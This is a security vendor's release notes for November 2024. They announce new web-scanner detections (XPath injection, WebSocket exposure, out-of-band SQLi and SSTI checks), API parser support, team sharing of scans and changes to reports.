Release notes

2024-11-19: Boost your web scans - faster, more accurate & expanded detection capabilities

Watch the full video for this release

Boost your web scans - faster, more accurate & expanded detection capabilities

The latest web scan engine update delivers faster, more precise scanning with expanded detection capabilities. It optimizes workflows for efficient, comprehensive scans and quicker responses to security threats. 

Key new features include an email misconfiguration checker, active and passive file exposure scanning, email configuration analysis, XPath injection detection, brute-force URL discovery, and WebSocket vulnerability identification. 

Enhanced Out-of-Band (OOB) vulnerability coverage now includes advanced threat detection for SSTI, SQL injection, response splitting, OS command injection, and remote file inclusion. These upgrades provide a robust defense against complex, asynchronous, and real-time threats. 

Our latest update brings several key improvements to the web scan engine, delivering faster scan times and enhanced detection results accuracy. These optimizations streamline scanning workflows, reducing processing time while maintaining a high level of thoroughness. This overall enhancement supports more efficient, accurate scanning processes for our users, enabling quicker identification and response to potential security issues. 

Included in this update is also coverage for additional vulnerabilities:  

  • Email misconfiguration checker 
    Identifies misconfigurations in email setups that may lead to unauthorized access or exposure of sensitive data. 
  • Metrics file exposure (active) 
    Actively scans for exposed metrics files that could reveal sensitive operational data. 
  • Metrics file exposure (passive) 
    Passively monitor for metrics file exposure without impacting system performance, alerting to potential leaks. 
  • Email configuration analyzer 
    Analyze email server settings to detect vulnerabilities or insecure configurations that might be exploited by attackers. 
  • XPATH injection 
    Identifies potential vulnerabilities to XPath Injection attacks, where attackers manipulate query statements in XML applications. 
  • Brute force URL discovery 
    Utilizes brute-force techniques to uncover hidden or poorly secured URLs that may expose sensitive data or functionality. 
  • WebSocket exposure 
    Detects exposed WebSocket connections that could lead to unauthorized data access and real-time security risks. 
  • Open WebSocket vulnerability 
    Identifies open or insecure WebSocket channels that could allow attackers to intercept or inject data in real-time. 

Expanded coverage for Out-of-Band (OOB) vulnerabilities 

The new release includes several Out-of-Band (OOB) plugins designed to detect advanced, often elusive vulnerabilities that communicate indirectly. Among these, Out-of-Band Server-Side Template Injection (OOB SSTI) and Out-of-Band SQL Injection (OOB SQLI) are notable, alongside a total of seven OOB plugins that comprehensively cover threats like response splitting, OS command injection, and remote file inclusion, providing robust detection for complex, asynchronous attack vectors. 

Release plan 
The new version will be rolled out to public scanners first and will be available in locally installed Scanner Appliances in Q1 2025.  

Expanded detection capabilities for API Security 

The latest update strengthens API security with enhanced detection and mitigation features. It now scans for exposed API documentation to block unauthorized access and enforces strict parameter data-type limits to minimize injection risks. 

Parser support has been expanded to include RAML, HAR, Burp Suite, Fiddler, and Postman, ensuring seamless integration and analysis of exported data. 

These updates deliver deeper vulnerability insights, empowering users with robust defenses against API security threats. 

This release brings enhanced capabilities to your API security, enabling more thorough detection and mitigation of potential vulnerabilities. We’ve added additional coverage to detect exposed API documentation and enforce stricter API parameter data-type limits, providing an extra layer of protection against injection attacks and misuse. 

Additional API coverage included in this release: 

  • Exposed API documentation 
    Detects publicly accessible API documentation that could provide attackers with a roadmap to exploit APIs. 
  • API parameter data-type limits check 
    Verifies the robustness of API parameter data types and limits, reducing the risk of injection attacks and misuse. 

Enhanced API parser supports 

We are introducing enhanced parser support for widely used API formats and tools, allowing seamless integration and analysis of exported data across diverse platforms. The supported formats now include RAML (RESTful API Modeling Language), HAR (HTTP Archive), Burp Suite, Fiddler, and Postman, enabling automated identification and response parsing for all matched site paths. This comprehensive parsing capability extracts requests and responses across these APIs, empowering users with deeper security insights and vulnerability coverage. 

How do I set up input parsers in a web app scanning?

Want to get started with API Security? 

Please contact your sales representative or send an email to sales@holmsecurity.com, and we will help you get started with API Security. 

Release plan 
The new version will be rolled out to public scanners first and will be available in locally installed Scanner Appliances in Q1 2025.  

Share scans & schedules with teams 

You can now collaborate more effectively by sharing specific scans and schedules with selected Teams. This new feature enables targeted and delegated access so each Team can focus on relevant scans in their scope, ensuring streamlined workflows and enhanced security coverage. 

How do I share scans and schedules with teams?

Bulk update the business impact for network assets 

Easily streamline the management of network assets by bulk updating their business impact settings. This new capability allows you to adjust the business impact of multiple assets at once, reducing the manual effort. 

With the bulk update, you can adjust multiple assets at once and set their business impact to be inherited from Tags instead of being set individually per asset.  

How do I bulk update business impact on network assets?

Enhancements to reports  

Our latest update simplifies report distribution and enhances readability with the following improvements: 

Report sharing without phone number 

Generated reports can now be sent without the need for a password or phone number, making it easier to share insights with stakeholders without additional access barriers. Scheduled reports will receive this support in an upcoming product release. 

Improved report categories & template names 

Report categories and template names have been refreshed, helping you to quickly identify the right templates for your needs. 

Other enhancements 

  • The dashboard has received several improvements, including updated description texts and minor issues that have been resolved across widgets.